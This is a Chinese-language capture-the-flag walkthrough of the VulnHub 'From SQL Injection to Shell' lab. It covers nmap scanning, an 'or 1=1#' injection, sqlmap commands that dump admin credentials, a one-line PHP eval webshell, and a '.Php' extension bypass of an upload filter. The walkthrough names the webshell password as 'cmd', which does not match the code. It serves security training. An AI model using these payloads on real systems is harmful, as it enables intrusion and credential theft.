靶机官网:
https://www.vulnhub.com/entry/pentester-lab-from-sql-injection-to-shell,80/
靶机镜像ISO下载地址:(转链)
from_sqli_to_shell_i386.iso - 4275.COM
一、启动靶机
二、查找靶机 IP 地址(2种方法)
1.使用 netdiscover 命令:
在 Kali 终端中,输入 netdiscover 命令,该命令会自动扫描局域网内的活跃主机,尝试查找靶机的 IP 地址。
netdiscover
2.使用 arp - scan 命令:
执行 arp - scan - l - D 命令,对同网段下的主机进行扫描。此命令通过发送 ARP 请求并接收响应,来获取局域网内设备的 IP 地址和 MAC 地址信息。
arp-scan -l -D
三、端口扫描与服务探测
1.全端口扫描:
nmap --min - rate 10000 - p - 192.168.16.132 命令对靶机进行全端口扫描。该命令以较高的扫描速率(每分钟至少 10000 个数据包)探测靶机上开放的所有 TCP 端口。扫描结果显示,靶机开放了 22 端口(SSH 服务)和 80 端口(HTTP 服务)。
nmap --min - rate 10000 - p - 192.168.16.132
2.对80端口详细扫描:
针对开放的 80 端口,执行 nmap - sT - sC - sV - O - p80 192.168.16.132 命令。此命令在进行 TCP 连接扫描(-sT)的同时,还会运行一系列默认脚本(-sC)来检测常见的漏洞和服务信息,获取服务版本(-sV)以及尝试识别靶机操作系统(-O)。扫描结果表明,80 端口运行的是 Apache httpd 2.2.16 版本(基于 Debian 系统),操作系统为 Linux,内核版本在 2.6.32 - 2.6.35 之间。
nmap - sT - sC - sV - O - p80 192.168.16.132
四、浏览器访问靶机 IP
在确定靶机开放 80 端口且运行着 Web 服务后,我们在浏览器中输入靶机 IP 地址 192.168.16.132 进行访问。打开页面后,呈现出一个名为 “My Awesome Photoblog” 的网站,页面展示了一些图片相关的内容,如 “last picture: cthulhu” 等信息,同时右侧有 “Admin” 选项卡。
五、寻找sql注入漏洞(2种方法)
1.nmap漏洞脚本扫描
使用 nmap --script = vuln - p80 192.168.16.132 命令尝试利用 nmap 的漏洞脚本扫描 80 端口的漏洞。
nmap --script = vuln - p80 192.168.16.132
发现了了大量的SQL注入点:
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.16.132:80/cat.php?id=2%27%20OR%20sqlspider
| http://192.168.16.132:80/cat.php?id=1%27%20OR%20sqlspider
| http://192.168.16.132:80/cat.php?id=3%27%20OR%20sqlspider
2.从页面url中id参数下手,找sql注入点
(1)发现登录Admin后台界面与潜在 SQL 注入漏洞
点击 “Admin” 选项卡后,进入到一个后台管理的登录界面。
为了登录成功,我们需要找到有效的用户名和密码。
在对网站进行初步探索时,我们点击了右侧的各个选项卡,并观察每个页面的 URL。
发现多个页面都是通过 GET 方式将参数 id 传递给 cat.php 文件来获取不同的内容,例如访问 192.168.16.132/cat.php?id = 1、192.168.16.132/cat.php?id = 2 等不同的 id 值会返回不同的图片信息。这种动态参数传递的方式存在 SQL 注入的可能性,因为攻击者可能通过构造恶意的 id 参数值来篡改数据库查询逻辑。
(2)确定 SQL 注入点
为了验证 SQL 注入点的存在,我们使用万能测试语句 “or 1 = 1#” 进行测试。将其添加到 URL 参数中,即访问 192.168.16.132/cat.php?id = 1 or 1 = 1#。
经过测试,页面内容发生改变且符合预期,显示了更多的图片信息,这表明成功找到了 SQL 注入点。
六、SQL 注入漏洞利用与信息获取
1.使用 sqlmap 扫描数据库
确定注入点后,我们借助强大的 sqlmap 工具来进一步探索数据库信息。
执行下面命令(2选一):
sqlmap - u "http://192.168.16.132/cat.php?id = 1" --dbs --batch
sqlmap -u "http://192.168.16.132:80/cat.php?id=2%27%20OR%20sqlspider" -dbs
会自动检测并利用注入点,尝试获取数据库列表。
fetching database names:
available databases [2]:
[*] information_schema
[*] photoblog
扫描结果显示靶机存在两个数据库,分别是 information_schema(MySQL 系统数据库,用于存储数据库元数据信息)和 photoblog(该摄影博客网站应用所使用的数据库)。
2.爆破 photoblog 数据库中的表
接着,我们对 photoblog 数据库中的表进行爆破。使用 sqlmap - u "http://192.168.16.132/cat.php?id = 1" - D photoblog --tables --batch 命令,sqlmap 将尝试获取 photoblog 数据库中的所有表名。
sqlmap - u "http://192.168.16.132/cat.php?id = 1" - D photoblog --tables --batch
经过一段时间的扫描,成功获取到三个表名:categories(可能用于存储图片分类信息)、pictures(可能存储图片相关数据)和 users(推测用于存储用户信息)。
3.获取 users 表的字段名
进一步深入,我们需要获取 users 表中的字段名。执行 sqlmap - u "http://192.168.16.132/cat.php?id = 1" - D photoblog - T users --columns --batch 命令。
sqlmap - u "http://192.168.16.132/cat.php?id = 1" - D photoblog - T users --columns --batch
sqlmap 成功获取到 users 表中的三个字段:id(数据类型为 mediumint (9),可能是用户 ID)、login(varchar (50),推测为用户名)和 password(varchar (50),显然是用户密码)。
4.获取 users 表中的用户数据
最后,我们使用 sqlmap - u "http://192.168.16.132/cat.php?id = 1" - D photoblog - T users - C id,login,password --dump --batch 命令来获取 users 表中这些字段的具体文本内容。
sqlmap - u "http://192.168.16.132/cat.php?id = 1" - D photoblog - T users - C id,login,password --dump --batch
经过爆破,我们成功获取到一条用户记录,其中用户名是 “admin”,密码的 MD5 值为 “8efe310f9ab3efeae8d410a8e0166eb2”。幸运的是,sqlmap 直接为我们解密了密码的 MD5 值,得到密码为 “P4ssw0rd”。
5.登录后台管理系统
有了用户名和密码,我们返回登录界面,输入 “admin” 和 “P4ssw0rd” 进行登录。
登录成功后,进入到后台管理页面,页面显示了图片管理相关的功能,包括查看图片、删除图片以及添加新图片等操作。
这个表是一个图片表,名称是一个herf,可以直接查看,后面的delete应该也是可以删除这张图片
七、文件上传漏洞利用与获取 Shell
1.文件上传功能测试
在后台管理页面中,我们注意到 “Add a new picture” 按钮,点击后发现可以上传文件。这意味着着可能存在通过文件上传功能获取更高权限的途径,例如上传恶意文件(如病毒木马)来控制靶机。
2.上传 PHP 文件失败
<?php @eval($_POST['webshell']); ?>
在 Kali 系统中,我们创建一个包含一句话木马的 PHP 文件(命名为abc.php),尝试通过文件上传功能将其上传到靶机。
、然而,上传失败!靶机显示 “No PHP!!”,这表明靶机对上传的文件进行了过滤,禁止直接上传 PHP 文件。
3.绕过文件上传过滤
经过初步分析,猜测靶机是通过检测文件后缀名来过滤上传文件的,即禁止上传后缀名为.php 的文件。为了绕过这个限制,我们将 PHP 文件的后缀名由原来的.php修改为.Php,然后再次尝试上传。
这次上传成功了,这进一步证实了我们的猜测,即靶机的上传检测机制仅针对文件后缀名,而未对文件内容进行检测。
4.寻找上传文件的存储位置
虽然上传的文件(伪装成.Php格式)成功上传到了靶机,但由于其实际上是一个 PHP 文件,我们需要找到一种方法使其能够被服务器解析为 PHP 脚本,从而执行我们的木马代码。
为此,我们使用 dirb 命令扫描网站后台目录,希望找到上传文件的存储位置。
dirb http://192.168.16.132
执行 dirb http://192.168.16.132命令后,我们发现了一个名为 “uploads” 的目录,根据其名称和网站的逻辑,我们推测上传的文件很可能保存在这个目录中
5.确认上传文件的访问路径
(1)查找上传文件的保存目录
dirb http://192.168.16.132/admin/uploads - w
为了验证我们的推测,我们使用 dirb 命令再次查看指定目录,执行 dirb http://192.168.16.132/admin/uploads - w 命令。
dirb http://192.168.16.132/admin/uploads - w
(2)通过后缀名.Php来验证文件保存位置
dirb http://192.168.16.132/admin/uploads - w -X .Php
从扫描结果中,我们成功找到了我们上传的文件 “abc.Php”。并且发现其访问路径为http://192.168.16.132/admin/uploads/abc.Php。
6.访问上传文件并获取 Shell
在浏览器中访问http://192.168.16.132/admin/uploads/abc.Php,如果一切顺利,我们的一句话木马将被执行,此时我们可以使用工具(如中国蚁剑或其他类似的 WebShell 管理工具)连接到这个地址,通过在工具中输入密码(这里是 “cmd”,与我们在一句话木马中设置的密码一致),成功连接后,我们就获取了靶机的 Shell 权限,可以在靶机上执行各种命令,进一步深入探索靶机系统,完成渗透测试的目标。
9853ba67-90cf-43c8-85b6-b843521a0946
var code = "9853ba67-90cf-43c8-85b6-b843521a0946"